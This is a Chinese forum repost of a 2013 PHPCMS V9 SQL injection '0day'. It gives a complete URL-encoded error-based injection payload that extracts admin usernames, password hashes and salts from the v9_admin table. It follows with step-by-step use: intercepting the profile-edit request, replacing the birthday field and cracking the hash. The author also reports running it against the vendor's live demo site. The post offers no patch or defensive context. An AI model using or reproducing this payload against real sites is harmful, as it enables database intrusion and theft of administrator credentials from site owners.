当前位置: 爱尖刀 > 首页安全 > 漏洞补丁 > 正文

PHPCMS_V9注入0DAY漏洞

2013-2-3 10:01 来源:法客论坛 浏览次数:1647 我来说两句(0)
PHPCMS_V9注入0DAY___EXP

漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.html
EXP构造:haxsscker

土司只给了张烂图- -没给语句……那我就自己构造吧……


本人构造结果如下(晚上又改了一下exp,去掉了可以没有的"where userid =1",去官方demo一样成功):

%60userid%60%3D%28select+1+from%28select+count%28%2A%29%2Cconcat%28%28select+%28select++%28select+concat%280x23%2Ccast%28concat%28username%2C0x3a%2Cpassword%2C0x3a%2Cencrypt%29+as+char%29%2C0x23%29+from+v9%5Fadmin+LIMIT++0%2C1%29%29+from+information%5Fschema%2Etables+limit+0%2C1%29%2Cfloor%28rand%280%29%2A2%29%29x+from+information%5Fschema%2Etables+group++by+x%29a%29+%2D%2D+

下面说说怎么用吧……

1.首先要注册个帐号不是?
这个不用截图了吧?。。

2.然后我们来到会员中心--->账号管理---->修改个人信息
1.jpg 

3.随便填个日期,然后提交时候抓包
2.jpg 

4.将birthday替换为我们的EXP
3.jpg 

5.提交出去,就得到账户,密码,盐
4.jpg 

6.cmd5提交碰运气吧……

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
不能光本地测试不是~~来,我们上http://v9.demo.phpcms.cn看看
一样的方法,一样的成功
2.jpg 

另外,如果对方改了表前缀,请把exp里面的前缀改掉,报错时候第一行就看得到前缀,默认是V9


[广告]赞助链接:

知安,互联网产品安全医院:http://www.knowsafe.com
舆情监测,互联网舆情首选查舆情:http://www.chayuqing.com/
爱尖刀科技,关注企业数据与安全:http://www.ijiandao.com

关注公众号:Mcbang_com 了解更多精彩,关注:chayuqing_com 娱乐资讯早知道!
收藏 分享 发布者: 疯子 |
看完这篇文章,你的感受如何?


伤心


无视


惊讶


流汗


赞同


路过
热点聚焦
更多>>
情凝中秋,乐在团圆 中秋节又称团圆节,是从古代至今,对远方亲人思念之情的体现;也是东方 ... [详细]
传递爱心 帮助需要的人 中国红十字已不能信任,民政系统变的自私,在这样的环境下,很多需 ... [详细]
【D盾】- 携手啊D共推《 [详细]
父亲节(Father's D 温家宝:父爱,如大海般深沉而宽广。 我们的力量出自与父亲,我们的 ... [详细]
祝高考学子凯旋而归 明后两天,高中三年的最后两天,也是将会影响命运的两天! 3年=1095天 ... [详细]

Archiver|网络尖刀 ( 京ICP备14006288号-3 )  

GMT+8, 2017-4-27 13:29 , Processed in 0.191617 second(s), 20 queries , Gzip On.

请勿发布违反中华人民共和国法律法规的言论
郑重声明:本站会员观点不代表【网络尖刀】论坛官方立场。

Copyright© 2006-2016 IjianDao.Com All rights reserved. 网络尖刀 版权所有

回顶部